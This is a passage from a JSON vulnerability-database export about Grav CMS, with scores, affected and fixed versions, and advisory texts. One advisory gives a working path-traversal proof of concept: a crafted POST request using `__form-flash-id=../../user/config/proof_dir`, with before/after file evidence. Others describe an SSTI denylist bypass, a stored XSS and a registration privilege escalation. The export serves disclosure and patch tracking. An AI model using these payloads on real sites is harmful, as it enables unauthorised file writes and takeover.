                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-7jaz-7xjc-kka1"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-a8y8-y4zt-zqbv"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-bwvg-jg4z-nyhp"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-ru55-uj84-p3dr"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-yh73-zyju-vqge"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        },
                        {
                            "vulnerability": "VCID-zg5t-uqx2-87fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"
                }
            ],
            "aliases": [
                "CVE-2023-34253",
                "GHSA-j3v8-v77f-fvgm"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rsc3-r7fy-pkca"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45692?format=api",
            "vulnerability_id": "VCID-ru55-uj84-p3dr",
            "summary": "Return of Wrong Status Code\nGrav is a file-based Web-platform built in PHP. Grav is subject to a server side template injection (SSTI) vulnerability. The fix for another SSTI vulnerability using `|map`, `|filter` and `|reduce` twigs implemented in the commit `71bbed1` introduces a bypass of the denylist due to an incorrect return value from `isDangerousFunction()`, which allows the payload to be executed by prepending a double backslash (`\\\\`). The `isDangerousFunction()` check in version 1.7.42 and onwards returns `false` instead of `true` when the `\\` symbol is found in the `$name`. This vulnerability can be exploited if the attacker has access to: 1. an Administrator account, or 2. a non-administrator user account that has Admin panel access and Create/Update page permissions. A fix for this vulnerability has been introduced in commit `b4c6210` and is included in release version `1.7.42.2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-37897",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00118",
                            "scoring_system": "epss",
                            "scoring_elements": "0.30282",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-37897"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/b4c62101a43051fc7f5349c7d0a5b6085375c1d7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/b4c62101a43051fc7f5349c7d0a5b6085375c1d7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37897",
                    "reference_id": "CVE-2023-37897",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37897"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9436-3gmp-4f53",
                    "reference_id": "GHSA-9436-3gmp-4f53",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-9436-3gmp-4f53"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-9436-3gmp-4f53",
                    "reference_id": "GHSA-9436-3gmp-4f53",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-9436-3gmp-4f53"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/662910?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.42.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ps5-3k43-p3fa"
                        },
                        {
                            "vulnerability": "VCID-4a2z-37a3-2qaw"
                        },
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-7jaz-7xjc-kka1"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-a8y8-y4zt-zqbv"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-bwvg-jg4z-nyhp"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-yh73-zyju-vqge"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        },
                        {
                            "vulnerability": "VCID-zg5t-uqx2-87fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42.2"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/66208?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.42%2B2",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42%252B2"
                }
            ],
            "aliases": [
                "CVE-2023-37897",
                "GHSA-9436-3gmp-4f53"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ru55-uj84-p3dr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95281?format=api",
            "vulnerability_id": "VCID-seer-x4fd-e7ge",
            "summary": "Grav has Unauthenticated Path Traversal & Arbitrary File Write in its FormFlash component\n# Vulnerability Report: Grav CMS Unauthenticated Path Traversal & Arbitrary File Write\n\n**[ZERO-DAY] Unauthenticated Path Traversal leading to Arbitrary Directory Creation and Configuration Injection**\n\n## Summary\n\nGrav CMS (v1.7.49.5 and latest development source) is vulnerable to a Zero-Day Path Traversal vulnerability within the FormFlash core component. By manipulating the session_id (passed as `__form-flash-id` in POST requests), an unauthenticated attacker can traverse the filesystem to create arbitrary directories and write an `index.yaml` file containing attacker-controlled data.\n\nThis vulnerability can lead to unauthorized modification of application behavior, potential data integrity issues, and service disruption in production environments.\n\n## Affected Component\n\n- Versions: Confirmed in Grav v1.7.49.5 (latest stable) and the latest development source (March 2026).\n- Class: `Grav\\Framework\\Form\\FormFlash`\n- Method: `__construct()` / `getTmpDir()`\n- Parameter: `session_id` (Mapped to `__form-flash-id` in POST requests)\n\n## Vulnerability Details\n\nThe FormFlash class is used to persist form data across redirects. It constructs a temporary storage path using the provided session_id. The path construction logic in the latest source:\n\n```php\n$folder = $config['folder'] ?? ($this->sessionId ? 'tmp://forms/' . $this->sessionId : '');\n$this->folder = $folder && $locator->isStream($folder) ? $locator->findResource($folder, true, true) : $folder;\n```\n\nLack of sanitization on the sessionId (the raw session identifier) allows the use of `../` sequences. 
When `findResource` resolves the stream, it allows escape into any writable directory within the webserver's scope (typically `user/config/`, `cache/`, `logs/`, and `tmp/`).\n\n## Affected Versions & Zero-Day Status\n\n- Tested Version: v1.7.49.5 (Latest Stable Release as of Nov 2025).\n- Development Branch Status: Vulnerable. The latest source code in the GitHub develop branch (March 2026) remains unpatched.\n- Affected Range: All Grav CMS versions utilizing the FormFlash component (v1.7.x and potentially older v1.6.x versions).\n- CVE Status: Zero-Day (Non-Registered). Extensive research confirmed no existing CVE addresses this specific core FormFlash session-based traversal.\n\n## Steps to Reproduce\n\n1. Identify any page containing a Grav Form (e.g., `/contact`).\n2. Intercept the POST request during form submission.\n3. Modify the `__form-flash-id` parameter to include a traversal sequence targeting a writable directory (e.g., `../../user/config/proof_dir`).\n4. Submit the request.\n5. 
Observe that a new directory (`poc/`) and file (`index.yaml`) have been created at the traversed path.\n\n## Request Example\n\n```http\nPOST /contact HTTP/1.1\nHost: target.grav.cms\nContent-Type: application/x-www-form-urlencoded\n\n__form-name-=contact&__form-flash-id=../../user/config/proof_dir&form-data[name]=Attack&form-data[message]=Payload\n```\n\n## Response / Result\n\n- HTTP/1.1 302 Found (Standard redirect)\n- Filesystem Modification:\n  - Directory Created: `/var/www/html/user/config/proof_dir/poc/`\n  - File Created: `/var/www/html/user/config/proof_dir/poc/index.yaml`\n\n## Proof of Concept Evidence (Before/After)\n\n### Before Exploitation\n\n- Status: Directory does not exist.\n- Evidence:\n\n```bash\n$ ls -la /var/www/html/user/config/proof_dir/\nls: cannot access '/var/www/html/user/config/proof_dir/': No such file or directory\n```\n\n### After Exploitation\n\n- Status: Arbitrary directory and `index.yaml` created.\n- Evidence:\n\n```bash\n$ ls -la /var/www/html/user/config/proof_dir/poc/index.yaml\n-rw-rw-r-- 1 www-data www-data 158 Mar 23 22:15 /var/www/html/user/config/proof_dir/poc/index.yaml\n$ cat /var/www/html/user/config/proof_dir/poc/index.yaml\nform: ''\nid: ''\nunique_id: poc\n...\ndata:\n  poc_status: confirmed\n```\n\n## Impact\n\n- Clarified Cross-User Attack: By controlling the session identifier, an attacker can overwrite or interfere with other users temporary form data, breaking session isolation.\n- Configuration Injection: Writing `index.yaml` into plugin/theme configuration subdirectories can alter application behavior or inject malicious settings.\n- Data Integrity: Unauthorized modification of configuration subfolders can lead to widespread site corruption or logical bypasses.\n- Denial of Service (DoS): Recursive directory creation enables attackers to exhaust disk space or inodes (inode exhaustion).\n\n## Attack Requirements\n\n- Authentication: None (Unauthenticated)\n- Configuration: Standard Grav installation with at 
least one form-enabled page (e.g., Contact, Login, Registration)\n\n## Exploitability Assessment\n\n- Complexity: Low. Requires only basic HTTP POST parameters.\n- Reliability: 100% (Deterministically reproducible in vulnerable versions).\n- Severity: Critical / High. The vulnerability requires no authentication and allows filesystem manipulation and session data corruption.\n\n## Remediation\n\n1. Sanitize Session IDs: Apply `basename()` or a strict alphanumeric regex to the `session_id` in FormFlash before path construction.\n2. Filesystem Hardening: Ensure `user/config/` and other sensitive directories have restrictive permissions preventing the webserver from creating new subdirectories.\n3. Update Grav: Monitor for patches addressing FormFlash sanitization.\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`d904efc33`](https://github.com/getgrav/grav/commit/d904efc33) — will ship in **2.0.0-beta.2**.\n\n**What changed:** `FormFlash::__construct()` now sanitizes `session_id`, `unique_id`, and `id` through a strict `[A-Za-z0-9,_-]{1,64}` allowlist before any path is constructed from them. Invalid values collapse to `''`, which causes `save()`/`delete()`/`getTmpDir()` to no-op — so a `__form-flash-id=../../user/config/proof_dir` POST simply does nothing on disk.\n\n**Files:**\n\n- [`system/src/Grav/Framework/Form/FormFlash.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Framework/Form/FormFlash.php)\n- [`tests/unit/Grav/Common/Security/FormFlashSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/FormFlashSecurityTest.php) — 32 test cases covering the PoC + variants.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42608",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.30653",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42608"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/d904efc33e03ebb597afde8d3368b28cf0423632",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/d904efc33e03ebb597afde8d3368b28cf0423632"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-hmcx-ch82-3fv2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-11T16:07:43Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-hmcx-ch82-3fv2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42608",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42608"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hmcx-ch82-3fv2",
                    "reference_id": "GHSA-hmcx-ch82-3fv2",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-hmcx-ch82-3fv2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-42608",
                "GHSA-hmcx-ch82-3fv2"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-seer-x4fd-e7ge"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49320?format=api",
            "vulnerability_id": "VCID-ss11-shq5-qqae",
            "summary": "Grav vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/pages/[page]` parameter `data[header][template]` in Advanced Tab\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][template]` parameter. The script is saved within the page's frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view.\n\n---",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66310",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00024",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07273",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66310"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:03:09Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66310",
                    "reference_id": "CVE-2025-66310",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66310"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7g78-5g5g-mvfj",
                    "reference_id": "GHSA-7g78-5g5g-mvfj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7g78-5g5g-mvfj"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj",
                    "reference_id": "GHSA-7g78-5g5g-mvfj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:03:09Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66310",
                "GHSA-7g78-5g5g-mvfj"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ss11-shq5-qqae"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91970?format=api",
            "vulnerability_id": "VCID-tkxm-vt8p-tqgv",
            "summary": "Grav Vulnerable to Privilege Escalation via Missing Server-Side Validation of groups/access\n# Bug Report: Registration Privilege Escalation via Missing Server-Side Validation of groups/access\n\n## Summary\n\nThe `Login::register()` method in the Login plugin accepts attacker-controlled `groups` and `access` fields from the registration POST data without server-side validation. When registration is enabled and `groups` or `access` are included in the configured allowed fields list, an unauthenticated user can self-register with `admin.super` privileges by injecting these fields into the registration request.\n\nThis is a missing server-side validation issue — the only defense is a config-level `fields` allowlist, which is an admin-facing setting, not a hardcoded security boundary.\n\n## Affected Component\n\n- **File:** `user/plugins/login/classes/Login.php`, lines 246-306\n- **Method:** `Login::register()`\n- **Validation:** `Login::validateField()`, lines 363-432\n- **Plugin:** Login Plugin 3.8.0\n- **Grav:** 1.8.0-beta.29\n\n## Root Cause\n\nIn `register()` (lines 254-267), the `groups` and `access` fields are only set to config defaults **if they are not already present in the input data**:\n\n```php\n// Line 254-260\nif (!isset($data['groups'])) {\n    $groups = (array) $this->config->get('plugins.login.user_registration.groups', []);\n    if (count($groups) > 0) {\n        $data['groups'] = $groups;\n    }\n}\n\n// Line 262-267\nif (!isset($data['access'])) {\n    $access = (array) $this->config->get('plugins.login.user_registration.access.site', []);\n    if (count($access) > 0) {\n        $data['access']['site'] = $access;\n    }\n}\n```\n\nIf an attacker **includes** `groups` or `access` in the POST body, the `!isset()` check passes and the config defaults are skipped. 
